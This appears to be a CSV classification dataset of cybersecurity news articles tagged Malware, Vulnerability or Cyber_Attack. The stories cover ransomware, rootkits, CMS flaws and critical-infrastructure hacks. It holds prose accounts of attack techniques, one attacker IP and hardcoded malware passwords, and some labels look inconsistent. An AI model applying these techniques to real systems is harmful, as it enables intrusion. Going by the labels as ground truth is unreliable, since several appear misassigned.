Title,Link,Article,Label "FBI offering $100,000 reward for information on Most Wanted Cyber Criminals",https://thehackernews.com/2013/11/fbi-offering-100000-reward-for.html,"The US Federal Bureau of Investigation has added five new hackers to its Cyber most wanted list and is seeking information from the public regarding their whereabouts. The men are wanted in connection with hacking and fraud crimes both within the US as well as internationally. Rewards ranging from up to $50,000 to $100,000 are being offered for information that leads to their arrest. Two of them are Pakistani, Farnhan Arshad and Noor Aziz Uddin, who caused the damage of over $50 million after hacking business telephone systems between 2008 and 2012. Arshad and Uddin are part of an international criminal ring that the FBI believes extends into Pakistan, the Philippines, Saudi Arabia, Switzerland, Spain, Singapore, Italy, Malaysia, and other locations. Syrian national Andrey Nabilevich Taame, wanted for his alleged role in Operation Ghost Click, a malware scheme that compromised more than four million computers in more than 100 countries between 2007 and October 2011; there were at least 500,000 victims in the United States alone. Alexsey Belan, a Russian national, is wanted for alleged hacking of three US-based companies between 2012 and 2013. Carlos Perez-Melara is wanted for his alleged involvement in manufacturing software that was used to intercept the private communications of hundreds of victims around September 2003. As part of the scheme, Perez-Melara ran a website offering customers a way to ""catch a cheating lover"" by sending ""spyware"" disguised as an electronic greeting card. The rewards are being offered for each of the five fugitives, all of whom are believed to be living outside the U.S. ""The expansion of the Cyber's Most Wanted list is a reflection of the FBI's increased efforts in this area,"" FBI officials said in a statement. ",Malware Critical infrastructure managing software vulnerable to Unauthorized access,https://thehackernews.com/2012/10/critical-infrastructure-managing.html,"Reid Wightman from security firm ioActive reported that there is an undocumented backdoor available in CoDeSys software that actually used to manage equipment in power plants, military environments, and nautical ships. The bug allow malicious hackers to access sensitive systems without authorization, Ars said. The CoDeSys tool will grant a command shell to anyone who knows the proper command syntax and inner workings, leaving systems that are connected to the public Internet open to malicious tampering and There is absolutely no authentication needed to perform this privileged command, Reid mention. This software has been used in industrial control systems sold by 261 different manufacturers. 3S-Smart Software Solutions designs CoDeSys and recently issued an advisory that recommends users set a password, but he is able to develop two exploit shells , one is codesys-shell.py (to get the CoDeSys command shell without authentication) and other , codesys-transfer.py (read or write files to the PLC without authentication) which works fine without authentication. This is another big security vulnerabilities that threaten power plants and other critical infrastructure both in the United States and elsewhere in the world. Wightman said a simple search using the Shodan, showed 117 devices directly connected to the Internet. Wightman said that additional vulnerability details about issue and exploit code that automates the hack can be added to Metasploit framework. ",Vulnerability 3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances,https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html,"SonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild. Tracked as CVE-2021-20021 and CVE-2021-20022, the flaws were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's ES application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021. FireEye is tracking the malicious activity under the moniker UNC2682. ""These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device,"" researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino said. The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files, and emails, and move laterally into the victim organization's network."" A brief summary of the three flaws are below - CVE-2021-20021 (CVSS score: 9.4) - Allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host CVE-2021-20022 (CVSS score: 6.7) - Allows a post-authenticated attacker to upload an arbitrary file to the remote host, and CVE-2021-20023 (CVSS score: 6.7) - A directory traversal flaw that allows a post-authenticated attacker to read an arbitrary file on the remote host. The administrative access not only enabled the attacker to exploit CVE-2021-20023 to read configuration files, counting those containing information about existing accounts as well as Active Directory credentials but also abuse CVE-2021-20022 to upload a ZIP archive containing a JSP-based web shell called BEHINDER that's capable of accepting encrypted command-and-control (C2) communications. ""With the addition of a web shell to the server, the adversary had unrestricted access to the command prompt, with the inherited permissions of the NT AUTHORITY\SYSTEM account,"" FireEye said, adding the attacker then used ""living off the land"" (LotL) techniques to harvest credentials, move laterally across the network, and even ""compress a subdirectory [that] contains daily archives of emails processed by SonicWall ES."" In the incident observed by the firm, the threat actor is said to have escalated their attack by conducting an internal reconnaissance activity, albeit briefly, prior to being isolated and removed from the environment, thus foiling their mission. The true motive behind the intrusion remains unclear. SonicWall users are recommended to upgrade to 10.0.9.6173 Hotfix for Windows and 10.0.9.6177 Hotfix for hardware and ESXi virtual appliances. The SonicWall Hosted Email Security product was automatically patched on April 19 and hence no additional action is required. UPDATE The Milpitas-headquartered network security firm labeled the findings as an outcome of routine collaboration with third-party researchers and forensic analysis firms to ensure its products adhere to the security best practices. ""Through the course of this process, SonicWall was made aware of and verified certain zero-day vulnerabilities — in at least one known case, being exploited in the wild — to its hosted and on-premises email security products,"" the company said in a statement to The Hacker News. ""SonicWall designed, tested and published patches to correct the issues and communicated these mitigations to customers and partners."" ",Cyber_Attack How to Decrypt TeslaCrypt Ransomware Files Using Master Key,https://thehackernews.com/2016/05/decrypt-teslacrypt-ransomware.html,"Here's some good news for victims who are trying to unlock and remove TeslaCrypt ransomware. Now, you can decrypt all your important files that have been encrypted by TeslaCrypt ransomware. So, stop Googling about How to decrypt TeslaCrypt Ransomware encrypted files, as the malware authors themselves provided the solution to your problem. Since its launch in March last year, TeslaCrypt computer virus has been used in massive malvertising attacks. The ransomware, which often targets PC gamers, locks up files until a ransom is paid, usually $500 in Bitcoin. Infection generally comes through corrupted websites, malvertising or phishing emails. In a surprising move in the malware's story, the cybercriminals behind the nefarious TeslaCrypt ransomware have apparently shut down their operations and released a master key to the public that can unlock all encrypted files on PCs infected by the latest versions of TeslaCrypt. The icing on the cake is that the universal decryption key is free, so victims can decrypt their files without paying a single penny. Here's what one of the developers of TeslaCrypt posted on the TeslaCrypt Dark Website: ""Project closed! Master key for decrypt: 440A241DD80FCC5664E861989DB716E08CE627D8D40C7EA360AE855C727A49EE. Wait for other people make universal decrypt software. We are sorry!"" The above note was prompted by a query from an ESET security researcher, who had noticed the successive downfall of TeslaCrypt and asked the authors for a decryption key. The authors offered a free master key in an entirely surprising move and ESET quickly created a Free Ransomware Decryptor tool for TeslaCrypt, which is available for download from the ESET website. How to Use Master Ransomware Decryption Key Using the master key, security researcher has created a decryptor tool that is available for download, with detailed instructions, from the ESET website. Bleeping Computer has also released another TeslaCrypt ransomware decryptor tool, dubbed TeslaDecoder, with a much easy-to-use interface. ",Malware "Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication",https://thehackernews.com/2013/05/mysterious-avatar-rootkit-with-api-sdk.html,"Early 2012 ESET company a mysterious malware, dubbed the Avatar rootkit (Win32/Rootkit.Avatar), advertised in the underground forums by Russian cyber crime. ""We present you here previously announced product. In connection with work on other projects, we moved the release date for the public from May to February 2013th 2012go.Now nuclear rootkit AVATAR is available for rental."" Despite the malware was described months ago it was not found and published until now, in March ESET researchers detected two droppers with different C&C servers and having different compilation time stamps as showed in the following pictures: The Avatar rootkit appears very sophisticated, it uses two different infection techniques, the first in the dropper so as to bypass detections by HIPS, and the second one in the rootkit driver to allow the malware to be alive after system reboot, the instance detected works only on x86 systems. The 2 level dropper for Avatar rootkit works in conjunction, the first one implements LZMA decompression for the second level dropper. Driver module and second level dropper are unique in every instance of malware thanks to a random names generator names for mutexes/events in the first level dropper. To the second level dropper is assigned the function of escalate privilege on target system, the dropper uses two different techniques, the exploitation of the MS11-080 vulnerability with code as a public exploit from Metasploit Framework with minor changes, and COM Elevation (UAC whitelist). The following a diagram that shows the process implemented by dropper: Most interesting part of the exploit code of Avatar rootkit is the steps taken after exploitation, kernel-mode shellcode is in fact executed to load malicious driver, the rootkit driver is not stored on the hard drive and loads only from a memory region. The Avatar rootkit implements a technique for loading the driver by system driver infection that appeared very effective for bypassing victim's defense, and allows the loads other kernel-mode modules exploiting the malicious system driver. The post reports: ""In order to perform its infection, Avatar randomly chooses a driver and checks its name against a blacklist that varies for every Windows versions."" ""The Avatar rootkit driver is able to infect several system drivers without changing the original driver's file size."" Once loaded the Avatar rootkit driver, the malicious code executes an algorithm for infecting system drivers so as to survive after reboot, the malware is also able to detect the presence of a virtual machine environment thanks to a sophisticated technique that query BIOS to check for some specific strings related to principal machines available on the market such as VirtualBox and VMware. The malware uses a hidden file system to store the user-mode payload module and also additional files, all the data are encrypted using a custom symmetric cipher. The hidden file storage is also used by Avatar rootkit to store additional user-mode and kernel-mode modules that malware can download and execute. Avatar rootkit doesn't store malicious modules in any standard NTFS storage, except for infected system drivers. The principal functionality of the malware are: command center communications parsing configuration information read/write into hidden file storage communicating with the rootkit driver installing additional user-mode and kernel-mode modules The post highlight the flexibility of the malicious agent: ""Of course, this means the initial infection can be the starting point of a variety of malicious activities based on the modules that deployed. In our case the payload component avcmd.dll was injected into svchost.exe system process which started communicating with C&C IP addresses stored in the configuration file. "" Another interesting feature implemented by authors of the rootkit in the protection of communications with the command center with a custom encryption algorithm which output is base64-encoded, Avatar rootkit has an additional way of communicating with the C&C server searching for messages in Yahoo groups using special parameters. The technique is not new and is very efficient to protect the malware over sinkhole attempts of security firms, because information about C&C's domains is encrypted using an RSA asymmetric algorithm. On the use of Yahoo Groups as C&C the report states: ""The group description is encrypted with an RSA algorithm and a 1024-bit private key. It is possible to decrypt this data with the public key stored in the configuration file. We suppose this information is to be found in the encrypted message used for returning control for a botnet without an active C&C."" But Avatar rootkit appears a very complex and articulated project, it is accompanied by a list of API for developing additional components based on the Avatar Runtime Library, a special SDK for developing additional user-mode components which allow communication with the Avatar rootkit driver. Win32/Rootkit.Avatar is considerable a sophisticated rootkit family having many interesting features to avoid detection by security software, due this reason security experts believe that the agent has been developed for long term infection by the system executing the attack. Avatar rootkit may hold many surprises in the next future. ",Vulnerability New Virus Decides If Your Computer Good for Mining or Ransomware,https://thehackernews.com/2018/07/cryptocurrency-mining-ransomware.html,"Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations to decide which of the two schemes could be more profitable. While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption key required to decrypt your files, cryptocurrency miners utilize infected system's CPU power to mine digital currencies. Both ransomware and cryptocurrency mining-based attacks have been the top threats so far this year and share many similarities such as both are non-sophisticated attacks, carried out for money against non-targeted users, and involve digital currency. However, since locking a computer for ransom doesn't always guarantee a payback in case victims have nothing essential to losing, in past months cybercriminals have shifted more towards fraudulent cryptocurrency mining as a method of extracting money using victims' computers. Researchers at Russian security firm Kaspersky Labs have discovered a new variant of Rakhni ransomware family, which has now been upgraded to include cryptocurrency mining capability as well. Written in Delphi programming language, the Rakhni malware is being spread using spear-phishing emails with an MS word file in the attachment, which if opened, prompts the victim to save the document and enable editing. The document includes a PDF icon, which if clicked, launches a malicious executable on the victim's computer and immediately displays a fake error message box upon execution, tricking victims into thinking that a system file required to open the document is missing. How Malware Decides What To Do However, in the background, the malware then performs many anti-VM and anti-sandbox checks to decide if it could infect the system without being caught. If all conditions are met, the malware then performs more checks to decide the final infection payload, i.e., ransomware or miner. 1.) Installs Ransomware—if the target system has a 'Bitcoin' folder in the AppData section. Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes that match a predefined list of popular applications and then displays a ransom note via a text file. 2.) Installs cryptocurrency miner—if 'Bitcoin' folder doesn't exist and the machine has more than two logical processors. If the system gets infected with a cryptocurrency miner, it uses MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background. Besides this, the malware uses CertMgr.exe utility to install fake root certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated in an attempt to disguise the miner as a trusted process. 3.) Activates worm component—if there's no 'Bitcoin' folder and just one logical processor. This component helps the malware to copy itself to all the computers located in the local network using shared resources. ""For each computer listed in the file the Trojan checks if the folder Users is shared and, if so, the malware copies itself to the folder \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup of each accessible user,"" the researchers note. Regardless of which infection is chosen, the malware performs a check if one of the listed antivirus processes is launched. If no AV process is found in the system, the malware will run several cmd commands in an attempt to disable Windows Defender. What's more? There's A Spyware Feature As Well ""Another interesting fact is that the malware also has some spyware functionality – its messages include a list of running processes and an attachment with a screenshot,"" the researchers say. This malware variant is targeting users primarily in Russia (95.5%), while a small number of infection has been noticed in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well. The best way to prevent yourself from being a victim of such attacks in the first place is never to open suspicious files and links provided in an email. Also, always keep a good backup routine and updated anti-virus software in place. ",Malware Wormable DarkRadiation Ransomware Targets Linux and Docker Instances,https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html,"Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called ""DarkRadiation"" that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. ""The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,"" researchers from Trend Micro said in a report published last week. ""The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."" As of writing, there's no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks. The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor's infrastructure (IP address ""185.141.25.168"") in a directory called ""api_attack."" The toolset was first noticed by Twitter user @r3dbU7z on May 28. DarkRadiation's infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys. Encryption Process Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called ""node-bash-obfuscate"" to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references. Upon execution, DarkRadiation checks if it's run as the root user, and if so, uses the elevated permissions to download and install Wget, cURL, and OpenSSL libraries, and takes a periodic snapshot of the users that are currently logged into a Unix computer system using the ""who"" command every five seconds, the results of which are then exfiltrated to an attacker-controlled server using the Telegram API. ""If any of these [libraries] are not available on the infected device, the malware attempts to download the required tools using YUM (Yellowdog Updater, Modified), a python-based package manager widely adopted by popular Linux distros such as RedHat and CentOS,"" SentinelOne researchers explained in a parallel write-up of DarkRadiation published Monday. The ransomware, in its final phase of the infection, retrieves a list of all available users on the compromised system, overwrites existing user passwords with ""megapassword,"" and deletes all shell users, but not before creating a new user with the username ""ferrum"" and password ""MegPw0rD3"" to proceed with the encryption process. Worm-like Spreading Functionality Interestingly, SentinelOne's analysis reveals different variations wherein the password for the user ""ferrum"" is downloaded from the attacker's C2 server in few versions, while in others, it is hardcoded with strings such as ""$MeGaPass123#,"" implying that the malware is undergoing rapid changes prior to actual deployment. ""It must be noted that the ransomware appends radioactive symbols ('.☢') as a file extension for an encrypted file,"" Trend Micro threat researcher Aliakbar Zahravi said. A second moving part associated with the attack is an SSH worm that's engineered to receive a credential configuration in the form of a base64-encoded parameter. Subsequently, this encoded argument is used to connect to the target system using the SSH protocol, and eventually download and execute the ransomware. In addition to reporting the execution status, along with the encryption key, back to the adversary's Telegram channel through the API, DarkRadiation also comes with capabilities to stop and disable all running Docker containers on the infected machine, after which a ransom note is displayed to the user. ""Malware written in shell script languages allows attackers to be more versatile and to avoid some common detection methods,"" SentinelOne researchers said. ""As scripts do not need to be recompiled, they can be iterated upon more rapidly. Moreover, since some security software relies on static file signatures, these can easily be evaded through rapid iteration and the use of simple obfuscator tools to generate completely different script files."" ",Malware New Fileless Ransomware with Code Injection Ability Detected in the Wild,https://thehackernews.com/2017/06/fileless-ransomware-code-injection.html,"It is no secret that hackers and cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day. While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that come with limitless attack vectors with low detection rates. Security researchers have recently discovered a new fileless ransomware, dubbed ""Sorebrect,"" which injects malicious code into a legitimate system process (svchost.exe) on a targeted system and then self-destruct itself in order to evade detection. Unlike traditional ransomware, Sorebrect has been designed to target enterprise's servers and endpoint. The injected code then initiates the file encryption process on the local machine and connected network shares. This fileless ransomware first compromises administrator credentials by brute forcing or some other means and then uses Microsoft's Sysinternals PsExec command-line utility to encrypt files. ""PsExec can enable attackers to run remotely executed commands, instead of providing and using an entire interactive login session, or manually transferring the malware into a remote machine, like in RDPs,"" Trend Micro says. Sorebrect Also Encrypts Network Shares Sorebrect also scans the local network for other connected computers with open shares and locks files available on them as well. ""If the share has been set up such that anyone connected to it has read-and-write access to it, the share will also be encrypted,"" researchers say. The nasty ransomware then deletes all event logs (using wevtutil.exe) and shadow copies (using vssadmin) on the infected machine that could provide forensic evidence such as files executed on the system and their timestamps, which makes this threat hard-to-detect. In addition, Sorebrect uses the Tor network protocol in an attempt to anonymize its communication with its command-and-control (C&C) server, just like almost every other malware. Sorebrect Ransomware Spreads Worldwide The Sorebrect fileless ransomware has been designed to target systems from various industries including manufacturing, technology, and telecommunications. According to Trend Micro, Sorebrect was initially targeting Middle Eastern countries like Kuwait and Lebanon, but from last month, this threat has started infecting people in Canada, China, Croatia, Italy, Japan, Mexico, Russia, Taiwan, and the U.S. ""Given ransomware's potential impact and profitability, it wouldn't be a surprise if SOREBRECT turns up in other parts of the world, or even in the cybercriminal underground where it can be peddled as a service,"" the researchers note. This is not the first time when researchers have come across Fileless malware. Two months ago, Talos researchers discovered a DNSMessenger attack that was completely Fileless and used DNS TXT messaging capabilities to compromise systems. In February, Kaspersky researchers also discovered fileless malware that resided solely in the memory of the compromised computers, which was found targeting banks, telecommunication companies, and government organizations in 40 countries. Ways to Protect Against Ransomware Attacks Since the ransomware does not target individuals but organizations, sysadmins and information security professionals can protect themselves by: Restricting user write permissions: a significant factor that exposes network shares to ransomware by giving users full permissions. Limiting privilege for PsExec: Limit PsExec and provide permission to run them only to system administrators. Keeping your system and network up-to-date: Always keep your operating system, software, and other applications updated. Backing up your data regularly: To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC. Adopting a cyber security-aware workforce: Educating your employees about malware, threat vectors and security measure always plays a major role in any organization. ",Malware Joomla 3.4.5 patches Critical SQL Injection Vulnerability,https://thehackernews.com/2015/10/joomla-security.html,"Joomla – one of the most popular open source Content Management System (CMS) software packages, has reportedly patched three critical vulnerabilities in its software. The flaws, exist in the Joomla version 3.2 to 3.4.4, include SQL injection vulnerabilities that could allow hackers to take admin privileges on most customer websites. The patch was an upgrade to Joomla version 3.4.5 and only contained security fixes. The vulnerability, discovered by Trustwave SpiderLabs researcher Asaf Orpani and Netanel Rubin of PerimeterX, could be exploited to attack a website with SQL injections. SQL injection (SQLi) is an injection attack wherein a bad actor can inject/insert malicious SQL commands/query (malicious payloads) through the input data from the client to the application. The vulnerability is one of the oldest, most powerful and most dangerous flaw that could affect any website or web application that uses an SQL-based database. The recent SQLi in Joomla discovered by Orpani are: CVE-2015-7297 CVE-2015-7857 CVE-2015-7858 CVE-2015-7857 enables an unauthorized remote attacker to gain administrator privileges by hijacking the admin session. Once exploited, the attacker may gain full control of the website and execute additional attacks. The vulnerability discovered in a core module that doesn't require any extensions, therefore, all the websites that use Joomla versions 3.2 (released in November 2013) and above are vulnerable. Researchers also discovered the related vulnerabilities, CVE-2015-7858 and CVE-2015-7297, as part of their research. Actually the Joomla code resided in /administrator /components /com_contenthistory/ models/history.php was vulnerable to SQL injection. Orpani came across many weak links in this code, that could: Exploit the vulnerability to gain the administrator session key On executing the request on Joomla site returns the admin session key Using the admin key to hijack the session and further gaining: Access to the /administrator/ folder Administrator privileges Access to the administrator Control Panel Vulnerability in DRUPAL The popular CMS Drupal has also patched an Open Redirect vulnerability in the Overlay module in its Core project (7.x versions prior to 7.41). The Overlay module in Drupal core project displays administrative pages as a layer on the current page, rather than replacing the page in the browser window. However, the module doesn't sufficiently validate URLs prior to displaying their contents, which leads to an open redirect vulnerability, according to Drupal's official blog. The vulnerability affected the site users with administrative rights; i.e. if only the ""Access the administrative overlay"" permission is enabled the vulnerability could be exploited. The fix for the open redirect vulnerability was released and required the sites to upgrade to Drupal version 7.41. If you were not aware of these vulnerabilities, do not panic you can patch your CMS now! ",Vulnerability World War C report - Motives behind State Sponsored Cyber Attacks,https://thehackernews.com/2013/10/world-war-c-report-motives-behind-state_3.html,"Nation-state driven cyber attacks are routinely conducted on a global scale to defend national sovereignty and project national power. We are living in the cyber era, human conflict is involving also the fifth domain of warfare, the cyberspace. As never before disputes take place with blows of bits, militias of every government are developing cyber capabilities dedicating great effort for the establishment of cyber units. Network security company, FireEye, has released a report titled ""World War C: Understanding Nation-State Motives Behind Today's Advanced Cyber Attacks"" which describes the effort spent by governments in cyber warfare context, the document analyzes in detail the different approaches adopted by various countries in conducting nation-state driven cyber attacks. Security experts highlight the intensification of state-sponsored attacks for both cyber espionage and sabotage purpose, campaigns such as Moonlight Maze and Titan Rain or the destructive cyber strikes on Iran and Georgia have signed the evolution of the military doctrine. ""Cyberspace has become a full-blown war zone as governments across the globe clash for digital supremacy in a new, mostly invisible theater of operations. Once limited to opportunistic criminals, cyber attacks are becoming a key weapon for governments seeking to defend national sovereignty and project national power."" In the arsenal of government militias are entering strongly DDoS tools, spyware and computer viruses, nation-state driven cyber attacks are considerable an optimal option by governments for the following reasons: Reduced costs compared to conventional strikes. Efficiency The asymmetric nature of the cyber attacks makes difficult the defense. The anonymous nature of the offense allows the attacking government to circumvent the approval by the world community to a military offensive. Possibility to conduct cyber attacks in peacetime for immediate geopolitical ends, as well as to prepare for possible future kinetic attacks. As explained in the study the attribution of responsibility for a cyber attack is a very hard task, FireEye experts correctly highlighted that to uncover the perpetrators is necessary to apply a multi layered approach based on forensic ""reverse-hacking"" techniques, build a deep knowledge of ""patterns"" of attack, evaluate the geopolitical context of cyber attacks aims associated to specific government. ""A cyber attack, viewed outside of its geopolitical context, allows very little legal maneuvering room for the defending state,"" ""False flag operations and the very nature of the internet makes tactical attribution a losing game. However, strategic attribution – fusing all sources of intelligence on a potential threat – allows a much higher level of confidence and more options for the decision maker,"" ""And strategic attribution begins and ends with geopolitical analysis."" said Professor Thomas Wingfield of the Marshall Centre, a joint US-German defense studies institute. ""The biggest challenge to deterring, defending against, or retaliating for cyber attacks is the problem of correctly identifying the perpetrator,"" said Prof. John Arquilla, Naval Postgraduate School ""Attribution"" for a nation-state driven cyber attack is difficult due to similarity with the methods adopted by single individuals, organizations, or state-sponsored hackers. States are often mistakenly identified as non-state entities, and vice versa. Another dangerous phenomenon that we are assisting is the growth of number of cyber mercenary groups close to governments that are structured as cyber criminal gangs but that are able to offer hacking services to involve in nation-state driven cyber attacks. ""Cybercrime organizations offer anyone, including governments, cyber attack services to include denial-of-service attacks and access to previously compromised networks."" states the World War C report. FireEye experts analyzed the Nation-state driven cyber attacks identifying the tactics and characteristics for the offensive in various regions: Asia-Pacific: home to large, bureaucratic hacker groups, such as the ""Comment Crew"" who pursues targets in high-frequency, brute-force attacks. Russia/Eastern Europe: More technically advanced cyber attacks that are often highly effective in evading detection. Middle East: Cybercriminals in the region often using creativity, deception, and social engineering to trick users into compromising their own computers. United States: origin of the most complex, targeted, and rigorously engineered cyber attack campaigns to date, such as the Stuxnet worm. Attackers favor a drone-like approach to malware delivery. New players are entering the arena of cyber warfare strongly, countries such a North Korea, Iran and Syria have demonstrated to represent a serious menace also for the most industrialized superpower, this is the democracy of the new military doctrine. Examining most advanced countries in cyber warfare, China is considered responsible for the largest number of Nation-state driven cyber attacks, it uses high-volume noisly cyber attacks mainly for cyber espionage. On the other end U.S., and Israel, providing the most advanced technologies, are able to conduct more sophisticated and surgical cyber operations, Stuxnet and Duqu are just a couple of examples of products of joint effort spent by the two governments. The Russian Government is considered one of the entities with major cyber capabilities, like Israel and US it is able to perform sophisticated nation-state driven cyber attacks, but little is known about the internal organization of its cyber units. According to rumors, a group of hackers that report directly to the President is the core of Russian cyber command that has operated in a stately way in cyberspace against hostile governments and on the domestic front against opponents of the regime. ""Though relatively quiet, Russia appears to be home to many of the most complex and advanced cyber attacks FireEye researchers have seen. More specifically, Russian exploit code can be significantly stealthier than its Chinese counterpart—which can also make it more worrisome. The ""Red October"" campaign, including its satellite software dubbed ""Sputnik,"" is a prominent example of likely Russian malware."" states the report. FireEye's World War C ends proposing a list of factors that could influence the cyber security landscape in the medium term: Outage of national critical infrastructure - we have still not assisted to cyber attacks that have compromised a national infrastructures like a power grid, but that day may not be far. Cyber arms treaty - we are already assisting with the cyber army race for the above reasons, governments will continue to invest to increase their cyber capabilities. Following the table reporting the investment in cyber capabilities I presented to the Cyber Threat Summit 2012, let's consider that that the expense has grown despite the cuts in most cases. PRISM, freedom of speech, and privacy - Disclosure of PRISM and other US surveillance activities will further complicate the delicate scenarios. The debate on topics such as freedom of speech and privacy could bring some ""annoyance"" to the intelligence activities conducted by the various governments, and nothing else in my judgment. No mistake, privacy and technology are like two separated spouses that live in the same house. New actors on the cyber stage - cyberspace is a crowded place, Iran, Syria, North Korea, and even non state actors such as Anonymous have employed cyber attacks as a way to conduct diplomacy and wage war by other means. FireEye researchers wager of growing cyber capabilities of Poland, Brazil and Taiwan. Stronger focus on evasion - due to the evolution of cyber defense attackers may be improve the offense with sophisticated techniques to avoid detection and fly under the radar. Information warfare is ongoing ... ",Cyber_Attack Hacker Caused Panic in Dallas by Turning ON Every Emergency Siren at Once,https://thehackernews.com/2017/04/dallas-tornado-siren-hack.html,"We have seen hackers flooding 911 emergency service with rogue requests to knock the service offline for an entire state, but some hacking incidents are worse than others. One such incident took place in Dallas on Friday night when hacker triggered a network of 156 emergency warning sirens for about two hours, waking up residents and sparking fears of a disaster. The emergency warning sirens — designed to warn citizens of the Texas about dangerous weather conditions, such as severe storms and tornados — were activated around 11:40 p.m. Friday and lasted until 1:20 a.m. Saturday. The city officials tried to inform residents not to call 911 as there was not any emergency situation in the city, but the 911 system was nevertheless flooded with over 4,400 calls from panicked residents. Rocky Vaz, director of Dallas Office of Emergency Management (OEM), told the Dallas Morning News that the alarms blasted about 15 times for 90-second durations. You can even watch video footage of the incident posted by some people on the social media. Ever wonder what the end of the world feels like? #dallas #sirens pic.twitter.com/dvokKWkZ6N — ManicPixieDreamGay (@deadlyblonde) April 8, 2017 The OEM technicians were eventually able to shut down the warning system and are working to keep this from happening again by implementing ""more safeguards."" The city officials said the sirens were set off by a hacker who compromised the Dallas city's emergency alert system, but they did not disclose how the system was compromised or who may be responsible for the attack. ""We can state at this time that the City's siren system was hacked Friday night,"" the Dallas Public Information Office confirmed on Saturday. ""For security reasons, we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area."" The officials have notified the Federal Communications Commission (FCC) for assistance in identifying the exact source of the hack. This is the second time when some hacker has attacked critical infrastructure in the city. Last year, some unknown hacker hacked into some traffic signals in Dallas and used them to publish jokes. Dallas Mayor Mike Rawlings noted on his Facebook page that the incident is yet ""another serious example of the need for us to upgrade and better safeguard our city's technology infrastructure,"" adding that they're working on identifying and prosecuting those responsible for the attack. ",Cyber_Attack DPScan : Drupal Security Scanner Released,https://thehackernews.com/2012/02/dpscan-drupal-security-scanner-released.html,"DPScan : Drupal Security Scanner Released The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines. This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster, Here is a little demonstration. After downloading the script (in python), you simply type: > python DPScan.py [website url] You can download Drupal Security Scanner here. ",Vulnerability New Mac malware opens secure connection for a remote hacker,https://thehackernews.com/2013/02/new-mac-malware-opens-secure-connection.html,"A new malware threat for the Mac has been discovered that attempting to set up a secure connection for a remote hacker to connect through and grab private information. Dubbed ""Pintsized"" that uses a modified version of OpenSSH to potentially set up a remote connection into Mac accounts. This backdoor Trojan can be used to conduct distributed denial of service (DDoS) attacks, or it can be used to install additional Trojans or other forms of malicious software. Since the connection between the hacker and the machine is encrypted, it becomes very hard for the Trojan to be detected or traced. The threat has the potential to become serious, as it uses an exploit in OS X to bypass Gatekeeper and establish a reverse shell that creates a secure connection. Trojan stays hidden by disguising itself as a file that is used for networked printers in Mac OS X. The location of the malware has been traced to this particular directory. This tactic conceals the Trojan and makes a monitor think that a printer is seeking access to the network. Pintsized hasn't been seen in the wild yet, according to security software maker Intego, since the malware looks to still be in a proof of concept stage. ",Malware FBI is Investigating Theft of $1.3 Million in Bitcoin from a Massachusetts Man,https://thehackernews.com/2016/10/bitcoin-hacked.html,"Over two months ago, the world's third largest Bitcoin Exchange Bitfinex lost around $72 Million worth of Bitcoins in a major hack. Shortly after the company encountered a $72,000,000 Bitcoin theft, an unnamed Bitfinex user from Cambridge, Massachusetts, filed a police report in September, alleging that $1.3 Million of funds were stolen from his account. Since then the Cambridge police have handed the case over to the FBI, which is working with the Bitcoin exchange as well as European authorities to recover funds stolen from the Bitfinex user, Coindesk reports. The individual claimed that he held $3.4 Million in Bitcoin in his personal wallet hosted by the Bitfinex Bitcoin exchange. But following the August's Bitfinex breach, he was left with $2.1 Million in his account. Bitfinex then notified the individual of his initial loss of approximately $1.3 Million in Bitcoin, but after the company issued IOU tokens as an emergency measure to keep the exchange operating, the loss incurred was reduced to just $720,000. The IOUs or BFX tokens are a form of compensation provided to the victims to reduce their losses by a significant factor. Although specific details remain still unclear, the Bitfinex user confirmed lose of funds beyond Bitfinex IOU tokens issued to all the victims of the breach. The usability of the token is still unclear. Neither the explanation of tokens provided by Bitfinex is much clear, nor the legal status of the tokens is known. ""The BFX tokens will remain outstanding until repaid in full by Bitfinex or exchanged for shares of iFinex Inc,"" explains the company. ""The specific conditions associated with the exchange of these tokens will be explained in a later announcement."" For the incident report filed by the Bitfinex user, you can head on to this link. No further details about the case are available at this moment. Shortly after the breach of around $72 Million worth of its 